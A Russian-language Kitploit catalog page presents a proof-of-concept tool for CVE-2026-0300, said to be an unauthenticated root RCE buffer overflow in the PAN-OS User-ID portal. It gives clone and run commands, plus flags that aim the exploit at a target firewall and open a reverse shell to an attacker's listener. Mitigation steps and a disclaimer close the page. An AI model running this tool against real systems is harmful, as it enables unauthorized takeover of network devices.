Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-0300-POC — Доказательство концепции для CVE-2026-0300, критического переполнения буфера в PAN-OS User-ID Portal, позволяющего неаутентифицированное удалённое выполнение кода с правами root. | Kitploit
Инструменты/GitHubGitHub/p3nt3st3r-star/cve-2026-0300-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubp3nt3st3r-star/cve-2026-0300-poc

CVE-2026-0300-POC

Доказательство концепции для CVE-2026-0300, критического переполнения буфера в PAN-OS User-ID Portal, позволяющего неаутентифицированное удалённое выполнение кода с правами root.

Репозиторий
21113 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ CVE-2026-0300: Анализ RCE-уязвимости User-ID™ Portal в PAN-OS

Исследовательский Proof-of-Concept: CWE-787 Выход за границы буфера при записи

Security Python License Dependencies

📌 Обзор

CVE-2026-0300 — это уязвимость переполнения буфера высокой степени серьезности, обнаруженная в Palo Alto Networks PAN-OS портале аутентификации User-ID™ (Captive Portal). Данный исследовательский репозиторий демонстрирует техническую логику уязвимости, уделяя особое внимание тому, как неаутентифицированный сетевой пакет может привести к удаленному выполнению кода (RCE) с привилегиями root.


📊 Разбивка уязвимости

ХарактеристикаДетали
ID CVECVE-2026-0300
Оценка серьезности9.3 (Критическая)
Тип слабостиCWE-787: Выход за границы буфера при записи
Вектор атакиСеть (без аутентификации)
Требуемые привилегииНет
Взаимодействие с пользователемНет
Затронутое ПОPAN-OS 12.1, 11.2, 11.1, 10.2

🔬 Технический механизм

Уязвимость возникает, когда служба портала аутентификации User-ID не проверяет длину входящих данных перед записью их в буфер памяти.

  1. Буфер: Служба выделяет область памяти фиксированного размера для обработки запросов портала.
  2. Переполнение: Специально созданный POST-запрос отправляет полезную нагрузку, превышающую этот размер.
  3. Перезапись: Избыточные данные перезаписывают стек/кучу, позволяя атакующему управлять указателем инструкций (EIP/RIP) и выполнять произвольный шелл-код.

🛠️ Установка и настройка

1. Предварительные требования

  • Python 3.9 или выше.
  • Внешние библиотеки не требуются (используются стандартные socket, struct и argparse).

2. Клонирование исследовательского инструмента

Клонируйте репозиторий

root@kitploit:~
git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git

Перейдите в папку

root@kitploit:~
cd CVE-2026-0300-POC

Сделайте скрипт исполняемым

root@kitploit:~
chmod +x research_poc.py

🚀 Руководство по использованию

Этот инструмент разработан с профессиональным CLI (интерфейсом командной строки).

Базовая команда

root@kitploit:~
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>

Расширенные параметры

ФлагИмяОписаниеПо умолчанию
-t--target(Обязательно) IP-адрес целевого межсетевого экрана.Н/Д
-p--portПорт, на котором работает портал User-ID.6082
-o--offsetДлина в байтах для достижения точки переполнения памяти.2048
-r--retШестнадцатеричный адрес возврата.0xdeadbeef
-l--lhostIP-адрес для reverse shellВаш IP
-L--lportВаш порт прослушивания4444

🛡️ Смягчение последствий и безопасность

  • Обновите PAN-OS: Установите последние исправления безопасности (выпущены в мае 2026 года).
  • Ограничение IP: Ограничьте доступ к порталу доверенными внутренними IP-зонами.
  • Отключение портала: Если аутентификация User-ID не требуется, отключите эту функцию.

⚠️ Этический и юридический отказ от ответственности

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ИССЛЕДОВАНИЙ. Несанкционированное тестирование систем, которыми вы не владеете, является незаконным. Автор не несет ответственности за любое неправомерное использование этого исследовательского кода. Используйте ответственно для повышения глобальной безопасности. Разработано: https://t.me/p3Nt3st3rsTAr Дата обнаружения уязвимости: 07 мая 2026 г.

Скачать инструмент